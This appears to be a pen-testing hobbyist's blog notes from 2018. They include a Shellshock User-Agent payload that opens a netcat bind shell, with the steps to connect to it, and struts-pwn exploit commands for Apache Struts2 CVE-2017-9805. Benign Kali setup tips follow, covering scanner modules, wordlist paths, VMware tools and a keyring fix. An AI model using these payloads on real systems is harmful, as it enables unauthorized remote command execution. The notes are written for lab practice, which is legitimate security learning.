when practicing pen testing on CVE-2014-6271
Burp Suite proxy, repeater, modify user agent
GET / HTTP/1.1
Host: xxx.xxx.xxx.xxx
User-Agent: () { :;}; /usr/bin/nc -l -p 9999 -e /bin/sh
the repeater will not return because it's waiting for a connection now
open another prompt and launch netcat to connect to port 9999
nc xxx.xxx.xxx.xxx 9999
you are now at the /bin/sh prompt for the compromised system so you can type a command like
"whoami"
Sunday, December 23, 2018
CVE: 2017-9805 - Apache Struts2 Rest Plugin Xstream RCE
I found this github page extremely useful when practicing pen testing on CVE: 2017-9805 - Apache Struts2 Rest Plugin Xstream RCE
https://github.com/mazen160/struts-pwn_CVE-2017-9805
https://github.com/mazen160/struts-pwn_CVE-2017-9805
Check if the vulnerability exists against a single URL.
python struts-pwn.py --url 'http://example.com/struts2-rest-showcase/orders/3'Exploit a single URL.
python struts-pwn.py --exploit --url 'http://example.com/struts2-rest-showcase/orders/3' -c 'touch /tmp/struts-pwn'kali metasploit website auxillary modules
use auxiliary/scanner/http/dir_listing
use auxiliary/scanner/http/dir_scanner
use auxiliary/scanner/http/files_dir
list all nmap scripts available
to see all the nmap scripts available you can list out this directory
ls /usr/share/nmap/scripts/
ls /usr/share/nmap/scripts/
vmware tools kali linux vmplayer
if you got kali linux and the vmware tools isn't working in vmplayer follow these instructions
http://www.vmwarearena.com/how-to-install-vmware-tools-on-kali-linux/
basically
1.) in vmplayer, manage -> install vmware tools
2.) open cd rom in kali
3.) copy .tar.gz to kali
4.) extract the .tar.gz
5.) run the vmware-install.pl
6.) choose all the defaults
7.) boom, vmware tools works again (like copy & paste to/from host)
http://www.vmwarearena.com/how-to-install-vmware-tools-on-kali-linux/
basically
1.) in vmplayer, manage -> install vmware tools
2.) open cd rom in kali
3.) copy .tar.gz to kali
4.) extract the .tar.gz
5.) run the vmware-install.pl
6.) choose all the defaults
7.) boom, vmware tools works again (like copy & paste to/from host)
dirbuster wordlist folder location
If you need a wordlist of directories for the dirbust tool they are located here on a default kali install
/usr/share/wordlists/dirbuster/
/usr/share/wordlists/dirbuster/
Saturday, December 22, 2018
apt-get update fails on Kali KEYEXPIRED
if
apt-get update
apt-get update
fails on Kali
with an error like this
Get:1 http://kali.download/kali kali-rolling InRelease [30.5 kB]
Err:1 http://kali.download/kali kali-rolling InRelease
The following signatures were invalid: KEYEXPIRED 1517583136 KEYEXPIRED 1517583136 KEYEXPIRED 1517583136 KEYEXPIRED 1517583136 KEYEXPIRED 1517583136
Fetched 30.5 kB in 8s (3,483 B/s)
Reading package lists... Done
W: An error occurred during the signature verification. The repository is not updated and the previous index files will be used. GPG error: http://kali.download/kali kali-rolling InRelease: The following signatures were invalid: KEYEXPIRED 1517583136 KEYEXPIRED 1517583136 KEYEXPIRED 1517583136 KEYEXPIRED 1517583136 KEYEXPIRED 1517583136
W: Failed to fetch http://http.kali.org/kali/dists/kali-rolling/InRelease The following signatures were invalid: KEYEXPIRED 1517583136 KEYEXPIRED 1517583136 KEYEXPIRED 1517583136 KEYEXPIRED 1517583136 KEYEXPIRED 1517583136
W: Some index files failed to download. They have been ignored, or old ones used instead.
The fix appears to be these 2 commands that get new keys
wget https://http.kali.org/kali/pool/main/k/kali-archive-keyring/kali-archive-keyring_2018.1_all.deb
apt install ./kali-archive-keyring_2018.1_all.deb
Subscribe to:
Posts (Atom)